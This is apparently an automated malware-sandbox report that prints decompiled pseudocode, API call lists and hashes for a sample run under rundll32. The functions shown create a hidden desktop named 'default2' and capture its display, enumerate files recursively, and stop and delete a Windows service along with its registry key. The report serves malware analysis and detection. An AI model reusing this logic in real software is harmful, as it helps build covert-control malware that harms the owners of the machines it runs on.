                                                                                              0x042567c5
                                                                                              0x042567ca
                                                                                              0x042567df

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 042565CF
                                                                                                • Part of subcall function 04256530: LoadLibraryA.KERNEL32(User32.dll,?,042565E3), ref: 04256536
                                                                                              • OpenDesktopW.USER32(default2,00000000,00000001,10000000), ref: 04256617
                                                                                              • CreateDesktopW.USER32(0429DA98,00000000,00000000,00000000,10000000,00000000), ref: 04256630
                                                                                              • SetThreadDesktop.USER32(?), ref: 0425663C
                                                                                              • GetDesktopWindow.USER32 ref: 04256642
                                                                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 0425664B
                                                                                              • GetMonitorInfoW.USER32(00000000,00000000), ref: 0425665D
                                                                                              • EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0425667A
                                                                                              • GetDC.USER32(00000000), ref: 04256739
                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 04256743
                                                                                              • GetVersionExA.KERNEL32(?), ref: 04256772
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Desktop$Create$MonitorWindow$CompatibleDisplayEnumEventFromInfoLibraryLoadOpenSettingsThreadVersion
                                                                                              • String ID: default2$h
                                                                                              • API String ID: 1408810681-1613360701
                                                                                              • Opcode ID: baf293cf6454c24f6fd47ad6ebd8a4fcb72be7b4dab3b6f4335dd34a597701c1
                                                                                              • Instruction ID: 9e876a0886aa3be931da5370b104482940c52c74a66debd721cea1fb73a7086c
                                                                                              • Opcode Fuzzy Hash: baf293cf6454c24f6fd47ad6ebd8a4fcb72be7b4dab3b6f4335dd34a597701c1
                                                                                              • Instruction Fuzzy Hash: BF6161B0A10616BFE715DF74DC49B9ABBB8FF04304F004229E50997680EB75B965CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 42%
                                                                                              			E042553D0(void* __ebx, void* __ecx, void* __edi, WCHAR* _a4) {
                                                                                              				signed int _v12;
                                                                                              				signed int _v1056;
                                                                                              				short _v2096;
                                                                                              				intOrPtr _v2100;
                                                                                              				intOrPtr _v2104;
                                                                                              				char _v2120;
                                                                                              				struct _WIN32_FIND_DATAW _v2712;
                                                                                              				signed int _v2713;
                                                                                              				intOrPtr _v2720;
                                                                                              				void* _v2724;
                                                                                              				void* __ebp;
                                                                                              				signed int _t64;
                                                                                              				void* _t73;
                                                                                              				signed int _t74;
                                                                                              				signed int _t75;
                                                                                              				signed int _t77;
                                                                                              				signed int _t82;
                                                                                              				signed int _t89;
                                                                                              				signed int _t90;
                                                                                              				signed int _t94;
                                                                                              				intOrPtr _t99;
                                                                                              				intOrPtr _t105;
                                                                                              				intOrPtr* _t108;
                                                                                              				signed int _t109;
                                                                                              				void* _t116;
                                                                                              				intOrPtr* _t121;
                                                                                              				intOrPtr* _t128;
                                                                                              				void* _t131;
                                                                                              				signed int _t134;
                                                                                              				signed int _t138;
                                                                                              				signed int _t139;
                                                                                              				intOrPtr _t140;
                                                                                              				void* _t141;
                                                                                              				signed int _t142;
                                                                                              				signed int _t143;
                                                                                              				WCHAR* _t145;
                                                                                              				intOrPtr _t150;
                                                                                              				intOrPtr _t152;
                                                                                              				void* _t153;
                                                                                              				signed int _t156;
                                                                                              				void* _t158;
                                                                                              				void* _t160;
                                                                                              
                                                                                              				_t64 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t64 ^ _t156;
                                                                                              				_t145 = _a4;
                                                                                              				_t116 = __ecx;
                                                                                              				E0427DEA0(_t145,  &_v2096, 0, 0x410);
                                                                                              				lstrlenW(_t145);
                                                                                              				_t150 =  !=  ? 0x429d92c : 0x429c5d0;
                                                                                              				_v2720 = 0x429c5d0;
                                                                                              				wsprintfW( &_v2096, L"%s%s*.*", _t145, 0x429c5d0);
                                                                                              				_t160 = _t158 + 0x1c;
                                                                                              				_t73 = FindFirstFileW( &_v2096,  &_v2712);
                                                                                              				_v2724 = _t73;
                                                                                              				if(_t73 != 0xffffffff) {
                                                                                              					_v2713 = 1;
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					do {
                                                                                              						_t121 = ".";
                                                                                              						_t74 =  &(_v2712.cFileName);
                                                                                              						while(1) {
                                                                                              							_t138 =  *_t74;
                                                                                              							__eflags = _t138 -  *_t121;
                                                                                              							if(_t138 !=  *_t121) {
                                                                                              								break;
                                                                                              							}
                                                                                              							__eflags = _t138;
                                                                                              							if(_t138 == 0) {
                                                                                              								L8:
                                                                                              								_t75 = 0;
                                                                                              							} else {
                                                                                              								_t143 =  *((intOrPtr*)(_t74 + 2));
                                                                                              								__eflags = _t143 -  *((intOrPtr*)(_t121 + 2));
                                                                                              								if(_t143 !=  *((intOrPtr*)(_t121 + 2))) {
                                                                                              									break;
                                                                                              								} else {
                                                                                              									_t74 = _t74 + 4;
                                                                                              									_t121 = _t121 + 4;
                                                                                              									__eflags = _t143;
                                                                                              									if(_t143 != 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										goto L8;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							L10:
                                                                                              							__eflags = _t75;
                                                                                              							if(_t75 == 0) {
                                                                                              								goto L29;
                                                                                              							} else {
                                                                                              								_t128 = L"..";
                                                                                              								_t89 =  &(_v2712.cFileName);
                                                                                              								while(1) {
                                                                                              									_t139 =  *_t89;
                                                                                              									__eflags = _t139 -  *_t128;
                                                                                              									if(_t139 !=  *_t128) {
                                                                                              										break;
                                                                                              									}
                                                                                              									__eflags = _t139;
                                                                                              									if(_t139 == 0) {
                                                                                              										L16:
                                                                                              										_t90 = 0;
                                                                                              									} else {
                                                                                              										_t142 =  *((intOrPtr*)(_t89 + 2));
                                                                                              										__eflags = _t142 -  *((intOrPtr*)(_t128 + 2));
                                                                                              										if(_t142 !=  *((intOrPtr*)(_t128 + 2))) {
                                                                                              											break;
                                                                                              										} else {
                                                                                              											_t89 = _t89 + 4;
                                                                                              											_t128 = _t128 + 4;
                                                                                              											__eflags = _t142;
                                                                                              											if(_t142 != 0) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              												goto L16;
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              									L18:
                                                                                              									__eflags = _t90;
                                                                                              									if(_t90 == 0) {
                                                                                              										goto L29;
                                                                                              									} else {
                                                                                              										__eflags = _v2712.dwFileAttributes & 0x00000010;
                                                                                              										_push( &(_v2712.cFileName));
                                                                                              										_push(_t150);
                                                                                              										_push(_t145);
                                                                                              										_v2713 = 0;
                                                                                              										_push(L"%s%s%s");
                                                                                              										_push( &_v1056);
                                                                                              										if((_v2712.dwFileAttributes & 0x00000010) == 0) {
                                                                                              											wsprintfW();
                                                                                              											_t94 = 0;
                                                                                              											_v2100 = 7;
                                                                                              											_t160 = _t160 + 0x14;
                                                                                              											_v2104 = 0;
                                                                                              											_v2120 = 0;
                                                                                              											__eflags = _v1056;
                                                                                              											if(_v1056 != 0) {
                                                                                              												_t108 =  &_v1056;
                                                                                              												_t141 = _t108 + 2;
                                                                                              												do {
                                                                                              													_t134 =  *_t108;
                                                                                              													_t108 = _t108 + 2;
                                                                                              													__eflags = _t134;
                                                                                              												} while (_t134 != 0);
                                                                                              												_t109 = _t108 - _t141;
                                                                                              												__eflags = _t109;
                                                                                              												_t94 = _t109 >> 1;
                                                                                              											}
                                                                                              											_push(_t94);
                                                                                              											E042532A0( &_v2120,  &_v1056);
                                                                                              											_t152 =  *((intOrPtr*)(_t116 + 0xc));
                                                                                              											_t140 = E04255CE0(_t152,  *((intOrPtr*)(_t152 + 4)),  &_v2120);
                                                                                              											_t99 =  *((intOrPtr*)(_t116 + 0x10));
                                                                                              											_t131 = 0x7fffffe - _t99;
                                                                                              											__eflags = _t131 - 1;
                                                                                              											if(__eflags < 0) {
                                                                                              												_push("list<T> too long");
                                                                                              												E04276A30(__eflags);
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												asm("int3");
                                                                                              												_push(_t156);
                                                                                              												_push(_t131);
                                                                                              												_push(_t152);
                                                                                              												_t153 = _t131;
                                                                                              												__eflags =  *(_t153 + 0x10);
                                                                                              												if( *(_t153 + 0x10) != 0) {
                                                                                              													_t131 = _t153 + 0xc;
                                                                                              													E042559F0(_t131, _t140);
                                                                                              												}
                                                                                              												_push(_t131);
                                                                                              												_push(0x3f);
                                                                                              												_push(1);
                                                                                              												_push( &_v12);
                                                                                              												_v12 = 0x6c;
                                                                                              												return E04251C60( *((intOrPtr*)(_t153 + 4)));
                                                                                              											} else {
                                                                                              												 *((intOrPtr*)(_t116 + 0x10)) = _t99 + 1;
                                                                                              												 *((intOrPtr*)(_t152 + 4)) = _t140;
                                                                                              												 *((intOrPtr*)( *((intOrPtr*)(_t140 + 4)))) = _t140;
                                                                                              												_t105 = _v2100;
                                                                                              												__eflags = _t105 - 8;
                                                                                              												if(_t105 >= 8) {
                                                                                              													__eflags = _t105 + 1;
                                                                                              													E04253540(_t116, _t140, _t145, _v2120, _t105 + 1);
                                                                                              												}
                                                                                              												_t150 = _v2720;
                                                                                              												goto L29;
                                                                                              											}
                                                                                              										} else {
                                                                                              											wsprintfW();
                                                                                              											_t160 = _t160 + 0x14;
                                                                                              											E042553D0(_t116, _t116, _t145,  &_v1056);
                                                                                              											goto L29;
                                                                                              										}
                                                                                              									}
                                                                                              									goto L40;
                                                                                              								}
                                                                                              								asm("sbb eax, eax");
                                                                                              								_t90 = _t89 | 0x00000001;
                                                                                              								__eflags = _t90;
                                                                                              								goto L18;
                                                                                              							}
                                                                                              							goto L40;
                                                                                              						}
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t75 = _t74 | 0x00000001;
                                                                                              						__eflags = _t75;
                                                                                              						goto L10;
                                                                                              						L29:
                                                                                              						_t77 = FindNextFileW(_v2724,  &_v2712);
                                                                                              						__eflags = _t77;
                                                                                              					} while (_t77 != 0);
                                                                                              					FindClose(_v2724);
                                                                                              					__eflags = _v2713;
                                                                                              					if(_v2713 != 0) {
                                                                                              						_t82 = lstrlenW(_t145);
                                                                                              						_push(_t145);
                                                                                              						__eflags =  *((short*)(_t145 + _t82 * 2 - 2)) - 0x5c;
                                                                                              						if( *((short*)(_t145 + _t82 * 2 - 2)) != 0x5c) {
                                                                                              							E042531B0( &_v2120, _t145);
                                                                                              							E04255AB0( &_v2120,  &_v2120, 1);
                                                                                              						} else {
                                                                                              							E042531B0( &_v2120, _t145);
                                                                                              						}
                                                                                              						_push( &_v2120);
                                                                                              						E04255A60(_t116 + 0xc, __eflags);
                                                                                              						E04253170( &_v2120);
                                                                                              					}
                                                                                              					__eflags = _v12 ^ _t156;
                                                                                              					return E04275AFE(_v12 ^ _t156);
                                                                                              				} else {
                                                                                              					return E04275AFE(_v12 ^ _t156);
                                                                                              				}
                                                                                              				L40:
                                                                                              			}













































                                                                                              0x042553d9
                                                                                              0x042553e0
                                                                                              0x042553e6
                                                                                              0x042553f7
                                                                                              0x042553f9
                                                                                              0x04255402
                                                                                              0x0425541e
                                                                                              0x04255429
                                                                                              0x0425542f
                                                                                              0x04255435
                                                                                              0x04255446
                                                                                              0x0425544c
                                                                                              0x04255455
                                                                                              0x0425546c
                                                                                              0x04255477
                                                                                              0x04255480
                                                                                              0x04255480
                                                                                              0x04255485
                                                                                              0x04255490
                                                                                              0x04255490
                                                                                              0x04255493
                                                                                              0x04255496
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04255498
                                                                                              0x0425549b
                                                                                              0x042554b2
                                                                                              0x042554b2
                                                                                              0x0425549d
                                                                                              0x0425549d
                                                                                              0x042554a1
                                                                                              0x042554a5
                                                                                              0x00000000
                                                                                              0x042554a7
                                                                                              0x042554a7
                                                                                              0x042554aa
                                                                                              0x042554ad
                                                                                              0x042554b0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042554b0
                                                                                              0x042554a5
                                                                                              0x042554bb
                                                                                              0x042554bb
                                                                                              0x042554bd
                                                                                              0x00000000
                                                                                              0x042554c3
                                                                                              0x042554c3
                                                                                              0x042554c8
                                                                                              0x042554d0
                                                                                              0x042554d0
                                                                                              0x042554d3
                                                                                              0x042554d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042554d8
                                                                                              0x042554db
                                                                                              0x042554f2
                                                                                              0x042554f2
                                                                                              0x042554dd
                                                                                              0x042554dd
                                                                                              0x042554e1
                                                                                              0x042554e5
                                                                                              0x00000000
                                                                                              0x042554e7
                                                                                              0x042554e7
                                                                                              0x042554ea
                                                                                              0x042554ed
                                                                                              0x042554f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042554f0
                                                                                              0x042554e5
                                                                                              0x042554fb
                                                                                              0x042554fb
                                                                                              0x042554fd
                                                                                              0x00000000
                                                                                              0x04255503
                                                                                              0x04255503
                                                                                              0x04255510
                                                                                              0x04255511
                                                                                              0x04255512
                                                                                              0x04255519
                                                                                              0x04255520
                                                                                              0x04255525
                                                                                              0x04255526
                                                                                              0x04255544
                                                                                              0x0425554a
                                                                                              0x0425554c
                                                                                              0x04255556
                                                                                              0x04255559
                                                                                              0x04255563
                                                                                              0x0425556a
                                                                                              0x04255571
                                                                                              0x04255573
                                                                                              0x04255579
                                                                                              0x04255580
                                                                                              0x04255580
                                                                                              0x04255583
                                                                                              0x04255586
                                                                                              0x04255586
                                                                                              0x0425558b
                                                                                              0x0425558b
                                                                                              0x0425558d
                                                                                              0x0425558d
                                                                                              0x0425558f
                                                                                              0x0425559d
                                                                                              0x042555a2
                                                                                              0x042555b5
                                                                                              0x042555bc
                                                                                              0x042555bf
                                                                                              0x042555c1
                                                                                              0x042555c4
                                                                                              0x04255686
                                                                                              0x0425568b
                                                                                              0x04255690
                                                                                              0x04255691
                                                                                              0x04255692
                                                                                              0x04255693
                                                                                              0x04255694
                                                                                              0x04255695
                                                                                              0x04255696
                                                                                              0x04255697
                                                                                              0x04255698
                                                                                              0x04255699
                                                                                              0x0425569a
                                                                                              0x0425569b
                                                                                              0x0425569c
                                                                                              0x0425569d
                                                                                              0x0425569e
                                                                                              0x0425569f
                                                                                              0x042556a0
                                                                                              0x042556a3
                                                                                              0x042556a4
                                                                                              0x042556a5
                                                                                              0x042556a7
                                                                                              0x042556ab
                                                                                              0x042556ad
                                                                                              0x042556b0
                                                                                              0x042556b0
                                                                                              0x042556b5
                                                                                              0x042556bc
                                                                                              0x042556be
                                                                                              0x042556c0
                                                                                              0x042556c1
                                                                                              0x042556ce
                                                                                              0x042555ca
                                                                                              0x042555cd
                                                                                              0x042555d0
                                                                                              0x042555d6
                                                                                              0x042555d8
                                                                                              0x042555de
                                                                                              0x042555e1
                                                                                              0x042555e3
                                                                                              0x042555eb
                                                                                              0x042555eb
                                                                                              0x042555f0
                                                                                              0x00000000
                                                                                              0x042555f0
                                                                                              0x04255528
                                                                                              0x04255528
                                                                                              0x0425552e
                                                                                              0x0425553a
                                                                                              0x00000000
                                                                                              0x0425553a
                                                                                              0x04255526
                                                                                              0x00000000
                                                                                              0x042554fd
                                                                                              0x042554f6
                                                                                              0x042554f8
                                                                                              0x042554f8
                                                                                              0x00000000
                                                                                              0x042554f8
                                                                                              0x00000000
                                                                                              0x042554bd
                                                                                              0x042554b6
                                                                                              0x042554b8
                                                                                              0x042554b8
                                                                                              0x00000000
                                                                                              0x042555f6
                                                                                              0x04255603
                                                                                              0x04255609
                                                                                              0x04255609
                                                                                              0x04255617
                                                                                              0x04255623
                                                                                              0x04255625
                                                                                              0x04255628
                                                                                              0x0425562e
                                                                                              0x04255635
                                                                                              0x0425563b
                                                                                              0x04255644
                                                                                              0x04255652
                                                                                              0x0425563d
                                                                                              0x0425563d
                                                                                              0x0425563d
                                                                                              0x0425565d
                                                                                              0x04255661
                                                                                              0x0425566c
                                                                                              0x0425566c
                                                                                              0x04255678
                                                                                              0x04255683
                                                                                              0x04255457
                                                                                              0x04255469
                                                                                              0x04255469
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFindFirstlstrlenwsprintf
                                                                                              • String ID: %s%s%s$%s%s*.*$list<T> too long
                                                                                              • API String ID: 4287520746-3667615295
                                                                                              • Opcode ID: b8a1001eadfe465cd2bcdae70bbd1b9b940b81b389122d110385cbc8a18f579c
                                                                                              • Instruction ID: 016edb98a289f9c0f6b3957a0fb950058dca699a687d2e9ca091d777e38f4ffe
                                                                                              • Opcode Fuzzy Hash: b8a1001eadfe465cd2bcdae70bbd1b9b940b81b389122d110385cbc8a18f579c
                                                                                              • Instruction Fuzzy Hash: AB618071B20219AFDB20AF24DC44BEAB7B9FF45354F4481D9D809A7154EB31AE84CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 45%
                                                                                              			E04253C30(void* __ebx, void* __edi, void* __esi, char* _a4) {
                                                                                              				signed int _v8;
                                                                                              				intOrPtr _v14;
                                                                                              				intOrPtr _v18;
                                                                                              				intOrPtr _v22;
                                                                                              				intOrPtr _v26;
                                                                                              				intOrPtr _v30;
                                                                                              				intOrPtr _v34;
                                                                                              				intOrPtr _v38;
                                                                                              				intOrPtr _v42;
                                                                                              				char _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				unsigned int _v52;
                                                                                              				intOrPtr _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				intOrPtr _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				long _v72;
                                                                                              				signed int _t84;
                                                                                              				long _t103;
                                                                                              				unsigned int _t107;
                                                                                              				intOrPtr _t117;
                                                                                              				signed int _t119;
                                                                                              				intOrPtr _t135;
                                                                                              				signed int _t137;
                                                                                              				void* _t146;
                                                                                              				intOrPtr _t152;
                                                                                              				long _t154;
                                                                                              				signed int _t155;
                                                                                              				signed int _t156;
                                                                                              				intOrPtr _t157;
                                                                                              				char* _t159;
                                                                                              				signed int _t160;
                                                                                              
                                                                                              				_t84 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t84 ^ _t160;
                                                                                              				_t159 = _a4;
                                                                                              				_v72 = GetTickCount();
                                                                                              				_t154 = GetTickCount();
                                                                                              				_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                                                              				_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                                                              				_v64 =  *((intOrPtr*)(_t159 + 0x18));
                                                                                              				_v68 =  *((intOrPtr*)(_t159 + 0x1c));
                                                                                              				_v44 = 0x267;
                                                                                              				while( *((char*)(_t159 + 1)) != 0) {
                                                                                              					_t103 = GetTickCount();
                                                                                              					_t142 = _t103 - _t154;
                                                                                              					_t107 = 0x10624dd3 * (_t103 - _t154) >> 0x20 >> 6;
                                                                                              					_v52 = _t107;
                                                                                              					if(_t107 >= 5) {
                                                                                              						_t154 = GetTickCount();
                                                                                              						_v48 = _t154;
                                                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 8)) != 0) {
                                                                                              							_t152 =  *((intOrPtr*)(_t159 + 0x14));
                                                                                              							_t157 =  *((intOrPtr*)(_t159 + 0x18));
                                                                                              							_t135 =  *((intOrPtr*)(_t159 + 0x1c));
                                                                                              							_v42 =  *((intOrPtr*)(_t159 + 0x10));
                                                                                              							_v38 = _t152;
                                                                                              							asm("sbb edx, [ebp-0x38]");
                                                                                              							_v34 = _t157;
                                                                                              							_v30 = _t135;
                                                                                              							_v26 = E04291B40( *((intOrPtr*)(_t159 + 0x10)) - _v56, _t152, _v52, 0);
                                                                                              							_t146 = _t157 - _v64;
                                                                                              							_v22 = _t152;
                                                                                              							asm("sbb eax, [ebp-0x40]");
                                                                                              							_v18 = E04291B40(_t146, _t135, _v52, 0);
                                                                                              							_push(_t146);
                                                                                              							_t142 =  *(_t159 + 8);
                                                                                              							_v56 =  *((intOrPtr*)(_t159 + 0x10));
                                                                                              							_push(0x3f);
                                                                                              							_v60 =  *((intOrPtr*)(_t159 + 0x14));
                                                                                              							_push(0x22);
                                                                                              							_push( &_v44);
                                                                                              							_v14 = _t152;
                                                                                              							_v64 = _t157;
                                                                                              							_v68 = _t135;
                                                                                              							E04251C60( *(_t159 + 8));
                                                                                              							_t154 = _v48;
                                                                                              						}
                                                                                              						_t117 =  *((intOrPtr*)(_t159 + 4));
                                                                                              						if( *((short*)(_t117 + 0x16)) == 2) {
                                                                                              							_t156 = 0;
                                                                                              							if( *((intOrPtr*)(_t117 + 0x1c)) > 0) {
                                                                                              								do {
                                                                                              									_t119 = E0427EF46(_t142) & 0x800000ff;
                                                                                              									if(_t119 < 0) {
                                                                                              										_t119 = (_t119 - 0x00000001 | 0xffffff00) + 1;
                                                                                              									}
                                                                                              									_t142 =  *( *((intOrPtr*)(_t159 + 4)) + 0x3c);
                                                                                              									 *(_t156 +  *( *((intOrPtr*)(_t159 + 4)) + 0x3c)) = _t119;
                                                                                              									_t156 = _t156 + 1;
                                                                                              								} while (_t156 <  *((intOrPtr*)( *((intOrPtr*)(_t159 + 4)) + 0x1c)));
                                                                                              							}
                                                                                              							_t154 = _v48;
                                                                                              						}
                                                                                              					}
                                                                                              					Sleep(0x64);
                                                                                              					_t137 = GetTickCount() - _v72;
                                                                                              					if(0x88888889 * (0x10624dd3 * _t137 >> 0x20 >> 6) >> 0x20 >> 5 >= ( *( *((intOrPtr*)(_t159 + 4)) + 0x14) & 0x0000ffff)) {
                                                                                              						 *((char*)(_t159 + 1)) = 0;
                                                                                              					}
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_t159 + 0x38)) != 0) {
                                                                                              					_t137 = 0;
                                                                                              					_t155 = 0;
                                                                                              					if(0 <  *( *((intOrPtr*)(_t159 + 4)) + 0x12)) {
                                                                                              						do {
                                                                                              							WaitForSingleObject( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4), 0xffffffff);
                                                                                              							CloseHandle( *( *((intOrPtr*)(_t159 + 0x38)) + _t155 * 4));
                                                                                              							_t155 = _t155 + 1;
                                                                                              						} while (_t155 < ( *( *((intOrPtr*)(_t159 + 4)) + 0x12) & 0x0000ffff));
                                                                                              					}
                                                                                              					 *_t159 = 1;
                                                                                              				}
                                                                                              				_push(_t137);
                                                                                              				_push(0x3f);
                                                                                              				_push(2);
                                                                                              				_v44 = 0x67;
                                                                                              				E04251C60( *(_t159 + 8));
                                                                                              				return E04275AFE(_v8 ^ _t160,  &_v44);
                                                                                              			}



































                                                                                              0x04253c36
                                                                                              0x04253c3d
                                                                                              0x04253c48
                                                                                              0x04253c4e
                                                                                              0x04253c57
                                                                                              0x04253c5c
                                                                                              0x04253c62
                                                                                              0x04253c68
                                                                                              0x04253c6e
                                                                                              0x04253c71
                                                                                              0x04253c77
                                                                                              0x04253c80
                                                                                              0x04253c89
                                                                                              0x04253c8f
                                                                                              0x04253c92
                                                                                              0x04253c98
                                                                                              0x04253ca0
                                                                                              0x04253ca5
                                                                                              0x04253cac
                                                                                              0x04253cb1
                                                                                              0x04253cb4
                                                                                              0x04253cb7
                                                                                              0x04253cbf
                                                                                              0x04253cc5
                                                                                              0x04253cc8
                                                                                              0x04253ccd
                                                                                              0x04253cd0
                                                                                              0x04253cdd
                                                                                              0x04253ce2
                                                                                              0x04253ce7
                                                                                              0x04253cea
                                                                                              0x04253cf4
                                                                                              0x04253cfa
                                                                                              0x04253cfb
                                                                                              0x04253cfe
                                                                                              0x04253d04
                                                                                              0x04253d06
                                                                                              0x04253d0c
                                                                                              0x04253d0e
                                                                                              0x04253d0f
                                                                                              0x04253d12
                                                                                              0x04253d15
                                                                                              0x04253d18
                                                                                              0x04253d23
                                                                                              0x04253d23
                                                                                              0x04253d26
                                                                                              0x04253d2e
                                                                                              0x04253d30
                                                                                              0x04253d35
                                                                                              0x04253d37
                                                                                              0x04253d3c
                                                                                              0x04253d41
                                                                                              0x04253d49
                                                                                              0x04253d49
                                                                                              0x04253d4d
                                                                                              0x04253d50
                                                                                              0x04253d53
                                                                                              0x04253d57
                                                                                              0x04253d37
                                                                                              0x04253d5c
                                                                                              0x04253d5c
                                                                                              0x04253d2e
                                                                                              0x04253d61
                                                                                              0x04253d70
                                                                                              0x04253d8b
                                                                                              0x04253d8d
                                                                                              0x04253d8d
                                                                                              0x04253d91
                                                                                              0x04253d9f
                                                                                              0x04253da4
                                                                                              0x04253da6
                                                                                              0x04253dac
                                                                                              0x04253db4
                                                                                              0x04253dbc
                                                                                              0x04253dc4
                                                                                              0x04253dcd
                                                                                              0x04253dd2
                                                                                              0x04253db4
                                                                                              0x04253dd6
                                                                                              0x04253dd6
                                                                                              0x04253dd9
                                                                                              0x04253de0
                                                                                              0x04253de2
                                                                                              0x04253de5
                                                                                              0x04253deb
                                                                                              0x04253e02

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CountTick$__aulldiv$CloseHandleObjectSingleSleepWait
                                                                                              • String ID: g
                                                                                              • API String ID: 227884459-30677878
                                                                                              • Opcode ID: e6cbb76f1214d8fcaa56851524f4d54f770d33b015cbe19cb8f950b73ace00a3
                                                                                              • Instruction ID: ad354eb9edff9903ab96257633232833a525eeeae44046732b8782e67c009dcf
                                                                                              • Opcode Fuzzy Hash: e6cbb76f1214d8fcaa56851524f4d54f770d33b015cbe19cb8f950b73ace00a3
                                                                                              • Instruction Fuzzy Hash: 8F514771A102099FCB24DFA9D984AAEFBF6FF48310F509519E846E76A1D730F845CB24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E04263A60(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v2056;
                                                                                              				intOrPtr _v2080;
                                                                                              				struct _SERVICE_STATUS _v2084;
                                                                                              				short* _v2088;
                                                                                              				void* _v2092;
                                                                                              				signed int _t13;
                                                                                              				void* _t15;
                                                                                              				void* _t38;
                                                                                              				short* _t41;
                                                                                              				void* _t42;
                                                                                              				signed int _t43;
                                                                                              
                                                                                              				_t13 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t13 ^ _t43;
                                                                                              				_t41 = __ecx;
                                                                                              				_v2088 = __ecx;
                                                                                              				_t15 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				_v2092 = _t15;
                                                                                              				if(_t15 == 0) {
                                                                                              					L12:
                                                                                              					return E04275AFE(_v8 ^ _t43);
                                                                                              				}
                                                                                              				_t38 = OpenServiceW(_t15, _t41, 0xf01ff);
                                                                                              				if(_t38 == 0) {
                                                                                              					L11:
                                                                                              					CloseServiceHandle(_v2092);
                                                                                              					goto L12;
                                                                                              				}
                                                                                              				_t42 = 0;
                                                                                              				do {
                                                                                              					if(QueryServiceStatus(_t38,  &_v2084) == 0) {
                                                                                              						goto L6;
                                                                                              					}
                                                                                              					if(_v2080 == 1) {
                                                                                              						if(DeleteService(_t38) != 0) {
                                                                                              							E0427DEA0(_t38,  &_v2056, 0, 0x800);
                                                                                              							wsprintfW( &_v2056, L"SYSTEM\\CurrentControlSet\\Services\\%s", _v2088);
                                                                                              							SHDeleteKeyW(0x80000002,  &_v2056);
                                                                                              						}
                                                                                              						L10:
                                                                                              						CloseServiceHandle(_t38);
                                                                                              						goto L11;
                                                                                              					}
                                                                                              					ControlService(_t38, 1,  &_v2084);
                                                                                              					Sleep(0x1f4);
                                                                                              					L6:
                                                                                              					_t42 = _t42 + 0x1f4;
                                                                                              				} while (_t42 < 0x1388);
                                                                                              				goto L10;
                                                                                              			}















                                                                                              0x04263a69
                                                                                              0x04263a70
                                                                                              0x04263a7c
                                                                                              0x04263a80
                                                                                              0x04263a86
                                                                                              0x04263a8c
                                                                                              0x04263a94
                                                                                              0x04263b5e
                                                                                              0x04263b6f
                                                                                              0x04263b6f
                                                                                              0x04263aa8
                                                                                              0x04263aac
                                                                                              0x04263b51
                                                                                              0x04263b57
                                                                                              0x00000000
                                                                                              0x04263b5d
                                                                                              0x04263ab2
                                                                                              0x04263ab4
                                                                                              0x04263ac4
                                                                                              0x00000000
